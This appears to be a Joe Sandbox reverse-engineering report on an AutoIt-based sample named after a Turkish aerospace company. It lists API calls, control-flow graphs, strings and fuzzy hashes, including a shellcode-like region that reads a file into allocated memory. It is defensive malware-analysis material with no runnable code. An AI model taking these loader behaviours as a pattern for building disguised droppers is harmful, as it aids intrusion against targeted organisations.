                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1500180987-0
                                                                                                                                    • Opcode ID: 22c26146bf17b54633d0e7c0aa79d78bca546bcbf126f9a7e96c54d69eb3d683
                                                                                                                                    • Instruction ID: d56839f5e9c8569490163cf2969622ac77bceab98d49c47ad5b2bf54d6d3b3eb
                                                                                                                                    • Opcode Fuzzy Hash: 22c26146bf17b54633d0e7c0aa79d78bca546bcbf126f9a7e96c54d69eb3d683
                                                                                                                                    • Instruction Fuzzy Hash: D0C15CB1D00219AEDF21DF95CC81EDEBBBDEF95304F0040AAE609E7181EB749A449F61

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                    • Opcode ID: 5af8f17c77ff1c91c8039bd23e31b6834991673c5eb742fc003e7f48ffceaab9
                                                                                                                                    • Instruction ID: b534c2f238e59b7e13bfa13bfdbc73700c3b9116f6ef83bab3c348fba4385b2b
                                                                                                                                    • Opcode Fuzzy Hash: 5af8f17c77ff1c91c8039bd23e31b6834991673c5eb742fc003e7f48ffceaab9
                                                                                                                                    • Instruction Fuzzy Hash: 7A3136B184534AAFDB60CFA4E889A8DBBF0FB09390F24455EE5C0E6294D3BA0585CF51

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                    • Opcode ID: 3660cc2c60e77d2fe5f307f97ad268229618e899c6660896037145c5ce06a63c
                                                                                                                                    • Instruction ID: 05663aeea9b0575f46bdb8a5f8ecb068aea0fb94b649693cc358fbd26a8b5c61
                                                                                                                                    • Opcode Fuzzy Hash: 3660cc2c60e77d2fe5f307f97ad268229618e899c6660896037145c5ce06a63c
                                                                                                                                    • Instruction Fuzzy Hash: 9421F4B1D00219AFDB20DFA4E888B9DBBF4FB08780F10411AF990E6294D7BA45448F91

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010652F8,?,00FA37AE,?), ref: 00FA4724
                                                                                                                                      • Part of subcall function 00FC050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FA7165), ref: 00FC052D
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FA71A8
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FDE8C8
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FDE909
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00FDE947
                                                                                                                                    • _wcscat.LIBCMT ref: 00FDE9A0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                    • API String ID: 2673923337-2727554177
                                                                                                                                    • Opcode ID: bb682af2efcc1917c71d8074816300a0e020b2aeafcbe0c62f37c2b1f9306e3a
                                                                                                                                    • Instruction ID: 45df1a56da4f13fe1dc6e028d76086493f71c4967623c37c0f4fdfc1421b97f0
                                                                                                                                    • Opcode Fuzzy Hash: bb682af2efcc1917c71d8074816300a0e020b2aeafcbe0c62f37c2b1f9306e3a
                                                                                                                                    • Instruction Fuzzy Hash: 5A7180B15093029EC324EF65EC81D9BBBF8FF89350F40052EF48587264DB7A9949DB92

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FA3A50
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00FA3A5F
                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00FA3A76
                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00FA3A88
                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00FA3A9A
                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA3AC0
                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00FA3B16
                                                                                                                                      • Part of subcall function 00FA3041: GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                                                                                      • Part of subcall function 00FA3041: RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                                                                                      • Part of subcall function 00FA3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                                                                                      • Part of subcall function 00FA3041: InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                                                                                      • Part of subcall function 00FA3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                                                                                      • Part of subcall function 00FA3041: LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                                                                                      • Part of subcall function 00FA3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                    • Opcode ID: b8ea8496d5097ea203a8893023410a52cf5e3b9394f4ce6f1edb52a4974c331b
                                                                                                                                    • Instruction ID: b8c09096c28dac162b98c169cc3723757366c36f233ac24d838e4577b2799c0e
                                                                                                                                    • Opcode Fuzzy Hash: b8ea8496d5097ea203a8893023410a52cf5e3b9394f4ce6f1edb52a4974c331b
                                                                                                                                    • Instruction Fuzzy Hash: FC215AB1D0030AAFEB20DFA4EC09B9D7BB5FB09791F10011AF584A62A5D3BA5640DF94

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 767 fa3633-fa3681 769 fa3683-fa3686 767->769 770 fa36e1-fa36e3 767->770 771 fa3688-fa368f 769->771 772 fa36e7 769->772 770->769 773 fa36e5 770->773 774 fa374b-fa3753 PostQuitMessage 771->774 775 fa3695-fa369a 771->775 777 fdd0cc-fdd0fa call fb1070 call fb1093 772->777 778 fa36ed-fa36f0 772->778 776 fa36ca-fa36d2 DefWindowProcW 773->776 782 fa3711-fa3713 774->782 780 fdd154-fdd168 call 1002527 775->780 781 fa36a0-fa36a2 775->781 783 fa36d8-fa36de 776->783 812 fdd0ff-fdd106 777->812 784 fa36f2-fa36f3 778->784 785 fa3715-fa373c SetTimer RegisterWindowMessageW 778->785 780->782 805 fdd16e 780->805 787 fa36a8-fa36ad 781->787 788 fa3755-fa3764 call fa44a0 781->788 782->783 791 fdd06f-fdd072 784->791 792 fa36f9-fa370c KillTimer call fa443a call fa3114 784->792 785->782 789 fa373e-fa3749 CreatePopupMenu 785->789 794 fdd139-fdd140 787->794 795 fa36b3-fa36b8 787->795 788->782 789->782 798 fdd0a8-fdd0c7 MoveWindow 791->798 799 fdd074-fdd076 791->799 792->782 794->776 801 fdd146-fdd14f call ff7c36 794->801 803 fa36be-fa36c4 795->803 804 fdd124-fdd134 call 1002d36 795->804 798->782 807 fdd078-fdd07b 799->807 808 fdd097-fdd0a3 SetFocus 799->808 801->776 803->776 803->812 804->782 805->776 807->803 813 fdd081-fdd092 call fb1070 807->813 808->782 812->776 816 fdd10c-fdd11f call fa443a call fa434a 812->816 813->782 816->776
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00FA36D2
                                                                                                                                    • KillTimer.USER32(?,00000001), ref: 00FA36FC
                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA371F
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA372A
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00FA373E
                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00FA374D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                    • Opcode ID: beec288486184ddb18241c3528087c9898e8429f42567a9aaa574fff03446639
                                                                                                                                    • Instruction ID: 6bf6cb44a1959a89cc0d34a3657a904c0dc956a6f0396eaa024dd629033f5339
                                                                                                                                    • Opcode Fuzzy Hash: beec288486184ddb18241c3528087c9898e8429f42567a9aaa574fff03446639
                                                                                                                                    • Instruction Fuzzy Hash: BD4158F2604106BBDB346F68DC09F793769FB47390F240119F582D63A5CA6A9E04B761

                                                                                                                                    Control-flow Graph

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                                    • API String ID: 1825951767-3513169116
                                                                                                                                    • Opcode ID: 899e281442fe9bf416f7589688144174c2202524c08f49eefdeca04841df2e03
                                                                                                                                    • Instruction ID: f7414daf0bea960b1e80dcf88118e738fc8301f97e88ecc6a0105c7d80ad31be
                                                                                                                                    • Opcode Fuzzy Hash: 899e281442fe9bf416f7589688144174c2202524c08f49eefdeca04841df2e03
                                                                                                                                    • Instruction Fuzzy Hash: D2A15FB2D1021E9ADB04EBA4DC91EEEB779FF16350F44042AF415B7191DF785A08EB60

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 942 1260b88-1260c36 call 125e598 945 1260c3d-1260c63 call 1261a98 CreateFileW 942->945 948 1260c65 945->948 949 1260c6a-1260c7a 945->949 950 1260db5-1260db9 948->950 956 1260c81-1260c9b VirtualAlloc 949->956 957 1260c7c 949->957 952 1260dfb-1260dfe 950->952 953 1260dbb-1260dbf 950->953 958 1260e01-1260e08 952->958 954 1260dc1-1260dc4 953->954 955 1260dcb-1260dcf 953->955 954->955 959 1260dd1-1260ddb 955->959 960 1260ddf-1260de3 955->960 961 1260ca2-1260cb9 ReadFile 956->961 962 1260c9d 956->962 957->950 963 1260e5d-1260e72 958->963 964 1260e0a-1260e15 958->964 959->960 967 1260de5-1260def 960->967 968 1260df3 960->968 969 1260cc0-1260d00 VirtualAlloc 961->969 970 1260cbb 961->970 962->950 965 1260e74-1260e7f VirtualFree 963->965 966 1260e82-1260e8a 963->966 971 1260e17 964->971 972 1260e19-1260e25 964->972 965->966 967->968 968->952 973 1260d07-1260d22 call 1261ce8 969->973 974 1260d02 969->974 970->950 971->963 975 1260e27-1260e37 972->975 976 1260e39-1260e45 972->976 982 1260d2d-1260d37 973->982 974->950 977 1260e5b 975->977 978 1260e47-1260e50 976->978 979 1260e52-1260e58 976->979 977->958 978->977 979->977 983 1260d6a-1260d7e call 1261af8 982->983 984 1260d39-1260d68 call 1261ce8 982->984 990 1260d82-1260d86 983->990 991 1260d80 983->991 984->982 992 1260d92-1260d96 990->992 993 1260d88-1260d8c CloseHandle 990->993 991->950 994 1260da6-1260daf 992->994 995 1260d98-1260da3 VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01260C59
                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01260E7F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0125E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_125e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 204039940-0
                                                                                                                                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                                    • Instruction ID: 6f7788dbafc4e9e419732ef1a84e2eeafad1e37391545ee4d4aeb40650aed14a
                                                                                                                                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                                    • Instruction Fuzzy Hash: F6A12970E10209EBDB14CFA4C895BEEBBB9FF48304F208559E615BB2C1D775AA80DB54

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1073 fa39d5-fa3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA3A03
                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA3A24
                                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00FA3A38
                                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00FA3A41
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                    • Opcode ID: 36388629160e7f414330786b6740770c525ebe7609d1b6b6d0e65fd5a35c3b5d
                                                                                                                                    • Instruction ID: b97db4279afa3fcdf3e7f47695c4bf2ce72e7b0e3343b2638be5caca9d9e856c
                                                                                                                                    • Opcode Fuzzy Hash: 36388629160e7f414330786b6740770c525ebe7609d1b6b6d0e65fd5a35c3b5d
                                                                                                                                    • Instruction Fuzzy Hash: 63F03A706002927EEA305A23AC09E2B2E7DE7CBF90B10001EF940E2168C26A0800DBB0

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1074 1260948-1260a87 call 125e598 call 1260838 CreateFileW 1081 1260a8e-1260a9e 1074->1081 1082 1260a89 1074->1082 1085 1260aa5-1260abf VirtualAlloc 1081->1085 1086 1260aa0 1081->1086 1083 1260b3e-1260b43 1082->1083 1087 1260ac3-1260ada ReadFile 1085->1087 1088 1260ac1 1085->1088 1086->1083 1089 1260ade-1260b18 call 1260878 call 125f838 1087->1089 1090 1260adc 1087->1090 1088->1083 1095 1260b34-1260b3c ExitProcess 1089->1095 1096 1260b1a-1260b2f call 12608c8 1089->1096 1090->1083 1095->1083 1096->1095
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01260838: Sleep.KERNELBASE(000001F4), ref: 01260849
                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01260A7D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0125E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_125e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFileSleep
                                                                                                                                    • String ID: LAU0117DYL3URY9D43KJO
                                                                                                                                    • API String ID: 2694422964-3824852089
                                                                                                                                    • Opcode ID: a6c7066b132d53d99519a30e216317f639ed5dfa13a6879cb46abbfc4214eab7
                                                                                                                                    • Instruction ID: 215f57a7c16b6ee01eef253cc9ead9630e2364eccea7ebbd0650db25024d27d8
                                                                                                                                    • Opcode Fuzzy Hash: a6c7066b132d53d99519a30e216317f639ed5dfa13a6879cb46abbfc4214eab7
                                                                                                                                    • Instruction Fuzzy Hash: 2751A230D14248DAEF11DBF4C854BEEBB79AF19304F104199E249BB2C1D7B91B85CBA5

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1098 fa407c-fa4092 1099 fa4098-fa40ad call fa7a16 1098->1099 1100 fa416f-fa4173 1098->1100 1103 fdd3c8-fdd3d7 LoadStringW 1099->1103 1104 fa40b3-fa40d3 call fa7bcc 1099->1104 1107 fdd3e2-fdd3fa call fa7b2e call fa6fe3 1103->1107 1104->1107 1108 fa40d9-fa40dd 1104->1108 1116 fa40ed-fa416a call fc2de0 call fa454e call fc2dbc Shell_NotifyIconW call fa5904 1107->1116 1120 fdd400-fdd41e call fa7cab call fa6fe3 call fa7cab 1107->1120 1111 fa40e3-fa40e8 call fa7b2e 1108->1111 1112 fa4174-fa417d call fa8047 1108->1112 1111->1116 1112->1116 1116->1100 1120->1116
                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FDD3D7
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    • _memset.LIBCMT ref: 00FA40FC
                                                                                                                                    • _wcscpy.LIBCMT ref: 00FA4150
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA4160
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                    • String ID: Line:
                                                                                                                                    • API String ID: 3942752672-1585850449
                                                                                                                                    • Opcode ID: 6c790eeaa3fa0b13828bb85f6dcc4db6bbd216215ad03ba656b424ac79eb4435
                                                                                                                                    • Instruction ID: c019dbc3a5b67a3bae2bb86c2a7c3c463eb41f9564fb8e2f247e9c16f5f56e18
                                                                                                                                    • Opcode Fuzzy Hash: 6c790eeaa3fa0b13828bb85f6dcc4db6bbd216215ad03ba656b424ac79eb4435
                                                                                                                                    • Instruction Fuzzy Hash: C931D0B1408301AFD331EB60DC46FDB77E8AF86354F14451EF5C582091EBB8A648E792

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
